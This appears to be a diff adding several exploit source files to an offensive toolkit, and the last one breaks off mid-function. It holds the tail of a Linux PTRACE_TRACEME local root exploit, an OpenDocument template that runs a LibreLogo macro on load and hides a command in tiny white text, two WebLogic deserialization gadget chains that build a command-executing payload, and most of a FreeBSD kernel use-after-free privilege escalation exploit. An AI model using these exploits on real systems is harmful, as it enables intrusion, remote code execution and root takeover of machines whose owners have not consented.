+  if (system("/sbin/sysctl kernel.yama.ptrace_scope 2>&1 | /bin/grep -q [23]") == 0) {
+    dprintf("[!] Warning: kernel.yama.ptrace_scope >= 2\n");
+    warn++;
+  }
+
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
+      dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
+      warn++;
+    }
+  }
+
+  if (warn > 0) {
+    dprintf("[~] Done, with %d warnings\n", warn);
+  } else {
+    dprintf("[~] Done, looks good\n");
+  }
+
+  return warn;
+}
+
+/*
+ * Use pkaction to search PolKit policy actions for viable helper executables.
+ * Check each action for allow_active=yes, extract the associated helper path,
+ * and check the helper path exists.
+ */
+#if ENABLE_AUTO_TARGETING
+int find_helpers() {
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] No helpers found. Could not find pkaction executable at %s.\n", pkaction_path);
+    return 0;
+  }
+
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("[-] Failed to run %s: %m\n", cmd);
+    return 0;
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  int blacklisted_helper = 0;
+  static const char *needle = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(needle);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    /* check the action uses allow_active=yes */
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+
+    useful_action = 0;
+
+    /* extract the helper path */
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, needle, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    int i;
+    for (i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    /* check helper path against helpers defined in 'blacklisted_helpers' array */
+    blacklisted_helper = 0;
+    for (i=0; i<sizeof(blacklisted_helpers)/sizeof(blacklisted_helpers[0]); i++) {
+      if (strstr(&buffer[0], blacklisted_helpers[i]) != 0) {
+        dprintf("[.] Ignoring helper (blacklisted): %s\n", &buffer[0]);
+        blacklisted_helper = 1;
+        break;
+      }
+    }
+    if (blacklisted_helper == 1)
+      continue;
+
+    /* check the path exists */
+    if (stat(&buffer[0], &st) != 0) {
+      dprintf("[.] Ignoring helper (does not exist): %s\n", &buffer[0]);
+      continue;
+    }
+
+    helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int ptrace_traceme_root() {
+  dprintf("[.] Trying helper: %s\n", helper_path);
+
+  /*
+   * set up a pipe such that the next write to it will block: packet mode,
+   * limited to one packet
+   */
+  SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
+  SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
+  char dummy = 0;
+  SAFE(write(block_pipe[1], &dummy, 1));
+
+  /* spawn pkexec in a child, and continue here once our child is in execve() */
+  dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
+  static char middle_stack[1024*1024];
+  pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!middle_success) return 1;
+
+  /*
+   * wait for our child to go through both execve() calls (first pkexec, then
+   * the executable permitted by polkit policy).
+   */
+  while (1) {
+    int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
+    char buf[16];
+    int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
+    buf[buflen] = '\0';
+    *strchrnul(buf, '\n') = '\0';
+    if (strncmp(buf, basename(helper_path), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  /*
+   * our child should have gone through both the privileged execve() and the
+   * following execve() here
+   */
+  dprintf("[.] Tracing midpid ...\n");
+  SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  SAFE(waitpid(midpid, &dummy_status, 0));
+  dprintf("[~] Attached to midpid\n");
+
+  force_exec_and_wait(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "stage2") == 0)
+    return middle_stage2();
+  if (strcmp(argv[0], "stage3") == 0)
+    return spawn_shell();
+
+  dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(argv[1], "check") == 0) {
+    exit(0);
+  }
+
+  int i;
+
+#if ENABLE_AUTO_TARGETING
+  /* search polkit policies for helper executables */
+  dprintf("[.] Searching policies for useful helpers ...\n");
+  find_helpers();
+  for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
+    if (helpers[i] == NULL)
+      break;
+
+    if (stat(helpers[i], &st) != 0)
+      continue;
+
+    helper_path = helpers[i];
+    ptrace_traceme_root();
+  }
+#endif
+
+#if ENABLE_FALLBACK_HELPERS
+  /* search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) != 0)
+      continue;
+
+    helper_path = known_helpers[i];
+    dprintf("[~] Found known helper: %s\n", helper_path);
+    ptrace_traceme_root();
+  }
+#endif
+
+  dprintf("[~] Done\n");
+
+  return 0;
+}
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:settings><config:config-item-set config:name="ooo:configuration-settings"><config:config-item config:name="LoadReadonly" config:type="boolean">true</config:config-item></config:config-item-set></office:settings>
+ <office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:LibreLogo|LibreLogo.py$run?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners></office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text" fo:color="#ffffff"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="20%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+  <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Preformatted_20_Text"><style:text-properties fo:color="#ffffff" fo:font-size="2pt" officeooo:rsid="00443c94" officeooo:paragraph-rsid="00443c94" style:font-size-asian="2pt" style:font-size-complex="2pt"/></style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+  <text:p text:style-name="P8"><%= @cmd %></text:p>
+  <text:p text:style-name="Standard">#<%= text_content %></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -0,0 +1,54 @@
+import com.tangosol.util.filter.LimitFilter;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+
+/*
+ *  BadAttributeValueExpException.readObject()
+ *  com.tangosol.util.filter.LimitFilter.toString()
+ *  com.tangosol.util.extractor.ChainedExtractor.extract()
+ *  com.tangosol.util.extractor.ReflectionExtractor.extract()
+ *  Method.invoke()
+ *  Runtime.exec()
+ *
+ *  PoC by Y4er
+ */
+public class Weblogic_2555
+{
+	public static void main(String args[]) throws Exception
+	{
+		ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
+		ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
+		ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
+
+		ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
+		ChainedExtractor chainedExt = new ChainedExtractor(extractors);
+		LimitFilter limitFilter = new LimitFilter();
+
+		Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+		m_comparator.setAccessible(true);
+		m_comparator.set(limitFilter, chainedExt);
+
+		Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+		m_oAnchorTop.setAccessible(true);
+		m_oAnchorTop.set(limitFilter, Runtime.class);
+
+		BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+		Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
+		field.setAccessible(true);
+		field.set(badAttributeValueExpException, limitFilter);
+
+		// Serialize object & save to file
+		FileOutputStream fos = new FileOutputStream("payload_obj.ser");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(badAttributeValueExpException);
+		os.close();
+
+	}
+}
@@ -0,0 +1,63 @@
+import com.tangosol.coherence.reporter.extractor.ConstantExtractor;
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+import com.supeream.serial.Reflections;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+import java.util.concurrent.Callable;
+
+/*
+ * java.util.PriorityQueue.readObject()
+  * java.util.PriorityQueue.heapify()
+  * java.util.PriorityQueue.siftDown()
+  * java.util.PriorityQueue.siftDownUsingComparator()
+  * com.tangosol.util.extractor.AbstractExtractor.compare()
+  * com.tangosol.util.extractor.MultiExtractor.extract()
+  * com.tangosol.util.extractor.ChainedExtractor.extract()
+  * Method.invoke()
+  * Runtime.exec()
+  *
+  * PoC by Y4er
+ */
+public class Weblogic_2883
+{
+	public static void main(String args[]) throws Exception
+	{
+		ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
+		ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
+		ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
+
+		ValueExtractor extractors[] = { new ConstantExtractor(Runtime.class), extractor, extractor2, extractor3 };
+		ChainedExtractor chainedExt = new ChainedExtractor(extractors);
+
+		Class clazz = ChainedExtractor.class.getSuperclass();
+		Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
+		m_aExtractor.setAccessible(true);
+
+		ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
+		ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
+			reflectionExtractor
+		};
+
+		ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
+
+		PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
+		queue.add("1");
+		queue.add("1");
+		m_aExtractor.set(chainedExtractor1, valueExtractors);
+
+		Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+		queueArray[0] = Runtime.class;
+		queueArray[1] = "1";
+
+
+		FileOutputStream fos = new FileOutputStream("payload_obj.ser");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(queue);
+		os.close();
+	}
+}
@@ -0,0 +1,611 @@
+/*
+  FreeBSD 12.0-RELEASE x64 Kernel Exploit
+
+  Usage:
+    $ clang -o exploit exploit.c -lpthread
+    $ ./exploit
+*/
+// msf note: written by theflow0: https://hackerone.com/reports/826026
+
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <stddef.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <pthread.h>
+#define _KERNEL
+#include <sys/event.h>
+#undef _KERNEL
+#define _WANT_FILE
+#include <sys/file.h>
+#include <sys/filedesc.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/socket.h>
+#define _WANT_SOCKET
+#include <sys/socketvar.h>
+#include <netinet/in.h>
+#define _WANT_INPCB
+#include <netinet/in_pcb.h>
+#include <netinet/ip6.h>
+#include <netinet6/ip6_var.h>
+
+// #define FBSD12
+
+#define ELF_MAGIC 0x464c457f
+
+#define IPV6_2292PKTINFO 19
+#define IPV6_2292PKTOPTIONS 25
+
+#define TCLASS_MASTER 0x13370000
+#define TCLASS_SPRAY 0x41
+#define TCLASS_TAINT 0x42
+
+#define NUM_SPRAY_RACE 0x20
+#define NUM_SPRAY 0x100
+#define NUM_KQUEUES 0x100
+
+#ifdef FBSD12
+#define ALLPROC_OFFSET 0x1df3c38
+#else
+#define ALLPROC_OFFSET 0xf01e40
+#endif
+
+#define PKTOPTS_PKTINFO_OFFSET (offsetof(struct ip6_pktopts, ip6po_pktinfo))
+#define PKTOPTS_RTHDR_OFFSET (offsetof(struct ip6_pktopts, ip6po_rhinfo.ip6po_rhi_rthdr))
+#define PKTOPTS_TCLASS_OFFSET (offsetof(struct ip6_pktopts, ip6po_tclass))
+
+#define PROC_LIST_OFFSET (offsetof(struct proc, p_list))
+#define PROC_UCRED_OFFSET (offsetof(struct proc, p_ucred))
+#define PROC_FD_OFFSET (offsetof(struct proc, p_fd))
+#define PROC_PID_OFFSET (offsetof(struct proc, p_pid))
+
+#ifdef FBSD12
+
+#define FILEDESC_FILES_OFFSET (offsetof(struct filedesc, fd_files))
+#define FILEDESCENTTBL_OFILES_OFFSET (offsetof(struct fdescenttbl, fdt_ofiles))
+#define FILEDESCENTTBL_NFILES_OFFSET (offsetof(struct fdescenttbl, fdt_nfiles))
+#define FILEDESCENT_FILE_OFFSET (offsetof(struct filedescent, fde_file))
+#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
+#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
+
+#else
+
+#define FILEDESC_OFILES_OFFSET (offsetof(struct filedesc, fd_ofiles))
+#define FILEDESC_NFILES_OFFSET (offsetof(struct filedesc, fd_nfiles))
+#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
+#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
+
+#endif
+
+#define KNOTE_FOP_OFFSET (offsetof(struct knote, kn_fop))
+#define FILTEROPS_DETACH_OFFSET (offsetof(struct filterops, f_detach))
+
+#define SOCKET_PCB_OFFSET (offsetof(struct socket, so_pcb))
+#define INPCB_OUTPUTOPTS_OFFSET (offsetof(struct inpcb, in6p_outputopts))
+
+int kqueue(void);
+int kevent(int kq, const struct kevent *changelist, int nchanges,
+           struct kevent *eventlist, int nevents,
+           const struct timespec *timeout);
+
+static uint64_t kernel_base;
+static uint64_t p_ucred, p_fd;
+static uint64_t kevent_addr, pktopts_addr;
+
+static int triggered = 0;
+static int kevent_sock, master_sock, overlap_sock, victim_sock;
+static int spray_sock[NUM_SPRAY];
+static int kq[NUM_KQUEUES];
+
+static void hexDump(const void *data, size_t size) {
+  size_t i;
+  for(i = 0; i < size; i++) {
+    printf("%02hhX%c", ((char *)data)[i], (i + 1) % 16 ? ' ' : '\n');
+  }
+  printf("\n");
+}
+
+static int new_socket(void) {
+  return socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
+}
+
+static void build_tclass_cmsg(char *buf, int val) {
+  struct cmsghdr *cmsg;
+
+  cmsg = (struct cmsghdr *)buf;
+  cmsg->cmsg_len = CMSG_LEN(sizeof(int));
+  cmsg->cmsg_level = IPPROTO_IPV6;
+  cmsg->cmsg_type = IPV6_TCLASS;
+
+  *(int *)CMSG_DATA(cmsg) = val;
+}
+
+static int build_rthdr_msg(char *buf, int size) {
+  struct ip6_rthdr *rthdr;
+  int len;
+
+  len = ((size >> 3) - 1) & ~1;
+  size = (len + 1) << 3;
+
+  memset(buf, 0, size);
+
+  rthdr = (struct ip6_rthdr *)buf;
+  rthdr->ip6r_nxt = 0;
+  rthdr->ip6r_len = len;
+  rthdr->ip6r_type = IPV6_RTHDR_TYPE_0;
+  rthdr->ip6r_segleft = rthdr->ip6r_len >> 1;
+
+  return size;
+}
+
+static int get_rthdr(int s, char *buf, socklen_t len) {
+  return getsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, &len);
+}
+
+static int set_rthdr(int s, char *buf, socklen_t len) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+}
+
+static int free_rthdr(int s) {
+  return set_rthdr(s, NULL, 0);
+}
+
+static int get_tclass(int s) {
+  int val;
+  socklen_t len = sizeof(val);
+  getsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, &len);
+  return val;
+}
+
+static int set_tclass(int s, int val) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, sizeof(val));
+}
+
+static int get_pktinfo(int s, char *buf) {
+  socklen_t len = sizeof(struct in6_pktinfo);
+  return getsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, &len);
+}
+
+static int set_pktinfo(int s, char *buf) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, sizeof(struct in6_pktinfo));
+}
+
+static int set_pktopts(int s, char *buf, socklen_t len) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, len);
+}
+
+static int free_pktopts(int s) {
+  return set_pktopts(s, NULL, 0);
+}
+
+static uint64_t leak_rthdr_ptr(int s) {
+  char buf[0x100];
+  get_rthdr(s, buf, sizeof(buf));
+  return *(uint64_t *)(buf + PKTOPTS_RTHDR_OFFSET);
+}
+
+static uint64_t leak_kmalloc(char *buf, int size) {
+  int rthdr_len = build_rthdr_msg(buf, size);
+  set_rthdr(master_sock, buf, rthdr_len);
+#ifdef FBSD12
+  get_rthdr(master_sock, buf, rthdr_len);
+  return *(uint64_t *)(buf + 0x00);
+#else
+  return leak_rthdr_ptr(overlap_sock);
+#endif
+}
+
+static void write_to_victim(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  *(uint64_t *)(buf + 0x00) = addr;
+  *(uint64_t *)(buf + 0x08) = 0;
+  *(uint32_t *)(buf + 0x10) = 0;
+  set_pktinfo(master_sock, buf);
+}
+
+static int find_victim_sock(void) {
+  char buf[sizeof(struct in6_pktinfo)];
+
+  write_to_victim(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
+
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    get_pktinfo(spray_sock[i], buf);
+    if (*(uint64_t *)(buf + 0x00) != 0)
+      return i;
+  }
+
+  return -1;
+}
+
+static uint8_t kread8(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint8_t *)buf;
+}
+
+static uint16_t kread16(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint16_t *)buf;
+}
+
+static uint32_t kread32(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint32_t *)buf;
+}
+
+static uint64_t kread64(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint64_t *)buf;
+}
+
+static void kread(void *dst, uint64_t src, size_t len) {
+  for (int i = 0; i < len; i++)
+    ((uint8_t *)dst)[i] = kread8(src + i);
+}
+
+static void kwrite64(uint64_t addr, uint64_t val) {
+  int fd = open("/dev/kmem", O_RDWR);
+  if (fd >= 0) {
+    lseek(fd, addr, SEEK_SET);
+    write(fd, &val, sizeof(val));
+    close(fd);
+  }
+}
+
+static int kwrite(uint64_t addr, void *buf) {
+  write_to_victim(addr);
+  return set_pktinfo(victim_sock, buf);
+}
+
+static uint64_t find_kernel_base(uint64_t addr) {
+  addr &= ~(PAGE_SIZE - 1);
+  while (kread32(addr) != ELF_MAGIC)
+    addr -= PAGE_SIZE;
+  return addr;
+}
+
+static int find_proc_cred_and_fd(pid_t pid) {
+  uint64_t proc = kread64(kernel_base + ALLPROC_OFFSET);
+
+  while (proc) {
+    if (kread32(proc + PROC_PID_OFFSET) == pid) {
+      p_ucred = kread64(proc + PROC_UCRED_OFFSET);
+      p_fd = kread64(proc + PROC_FD_OFFSET);
+      printf("[+] p_ucred: 0x%lx\n", p_ucred);
+      printf("[+] p_fd: 0x%lx\n", p_fd);
+      return 0;
+    }
+
+    proc = kread64(proc + PROC_LIST_OFFSET);
+  }
+
+  return -1;
+}
+
+#ifdef FBSD12
+
+static uint64_t find_socket_data(int s) {
+  uint64_t files, ofiles, fp;
+  int nfiles;
+  short type;
+
+  files = kread64(p_fd + FILEDESC_FILES_OFFSET);
+  if (!files)
+    return 0;
+
+  ofiles = files + FILEDESCENTTBL_OFILES_OFFSET;
+
+  nfiles = kread32(files + FILEDESCENTTBL_NFILES_OFFSET);
+  if (s < 0 || s >= nfiles)
+    return 0;
+
+  fp = kread64(ofiles + s * sizeof(struct filedescent) + FILEDESCENT_FILE_OFFSET);
+  if (!fp)
+    return 0;
+
+  type = kread16(fp + FILE_TYPE_OFFSET);
+  if (type != DTYPE_SOCKET)
+    return 0;
+
+  return kread64(fp + FILE_DATA_OFFSET);
+}
+
+#else
+
+static uint64_t find_socket_data(int s) {
+  uint64_t ofiles, fp;
+  int nfiles;
+  short type;
+
+  ofiles = kread64(p_fd + FILEDESC_OFILES_OFFSET);
+  if (!ofiles)
+    return 0;
+
+  nfiles = kread32(p_fd + FILEDESC_NFILES_OFFSET);
+  if (s < 0 || s >= nfiles)
+    return 0;
+
+  fp = kread64(ofiles + s * sizeof(struct file *));
+  if (!fp)
+    return 0;
+
+  type = kread16(fp + FILE_TYPE_OFFSET);
+  if (type != DTYPE_SOCKET)
+    return 0;
+
+  return kread64(fp + FILE_DATA_OFFSET);
+}
+
+#endif
+
+static uint64_t find_socket_pcb(int s) {
+  uint64_t f_data;
+
+  f_data = find_socket_data(s);
+  if (!f_data)
+    return 0;
+
+  return kread64(f_data + SOCKET_PCB_OFFSET);
+}
+
+static uint64_t find_socket_pktopts(int s) {
+  uint64_t in6p;
+
+  in6p = find_socket_pcb(s);
+  if (!in6p)
+    return 0;
+
+  return kread64(in6p + INPCB_OUTPUTOPTS_OFFSET);
+}
+
+static void cleanup(void) {
+  uint64_t master_pktopts, overlap_pktopts, victim_pktopts;
+
+  master_pktopts  = find_socket_pktopts(master_sock);
+  overlap_pktopts = find_socket_pktopts(overlap_sock);
+  victim_pktopts  = find_socket_pktopts(victim_sock);
+
+  kwrite64(master_pktopts  + PKTOPTS_PKTINFO_OFFSET, 0);
+  kwrite64(overlap_pktopts + PKTOPTS_RTHDR_OFFSET, 0);
+  kwrite64(victim_pktopts  + PKTOPTS_PKTINFO_OFFSET, 0);
+}
+
+static void escalate_privileges(void) {
+  char buf[sizeof(struct in6_pktinfo)];
+
+  *(uint32_t *)(buf + 0x00) = 0; // cr_uid
+  *(uint32_t *)(buf + 0x04) = 0; // cr_ruid
+  *(uint32_t *)(buf + 0x08) = 0; // cr_svuid
+  *(uint32_t *)(buf + 0x0c) = 1; // cr_ngroups
+  *(uint32_t *)(buf + 0x10) = 0; // cr_rgid
+
+  kwrite(p_ucred + 4, buf);
+}
+
+static int find_overlap_sock(void) {
+  set_tclass(master_sock, TCLASS_TAINT);
+
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    if (get_tclass(spray_sock[i]) == TCLASS_TAINT)
+      return i;
+  }
+
+  return -1;
+}
+
+static int spray_pktopts(void) {
+  for (int i = 0; i < NUM_SPRAY_RACE; i++)
+    set_tclass(spray_sock[i], TCLASS_SPRAY);
+
+  if (get_tclass(master_sock) == TCLASS_SPRAY)
+    return 1;
+
+  for (int i = 0; i < NUM_SPRAY_RACE; i++)
+    free_pktopts(spray_sock[i]);
+
+  return 0;
+}
+
+static void *use_thread(void *arg) {
+  char buf[CMSG_SPACE(sizeof(int))];
+  build_tclass_cmsg(buf, 0);
+
+  while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
+    set_pktopts(master_sock, buf, sizeof(buf));
+
+#ifdef FBSD12
+     usleep(100);
+#endif
+  }
+
+  triggered = 1;
+  return NULL;
+}
+
+static void *free_thread(void *arg) {
+  while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
+    free_pktopts(master_sock);
+
+#ifdef FBSD12
+    if (spray_pktopts())
+      break;
+#endif
+
+    usleep(100);
+  }
+
+  triggered = 1;
+  return NULL;
+}
+
+static int trigger_uaf(void) {
+  pthread_t th[2];
+
+  pthread_create(&th[0], NULL, use_thread, NULL);
+  pthread_create(&th[1], NULL, free_thread, NULL);
+
+  while (1) {
+    if (spray_pktopts())
+      break;
+
+#ifndef FBSD12
+    usleep(100);
+#endif
+  }
+
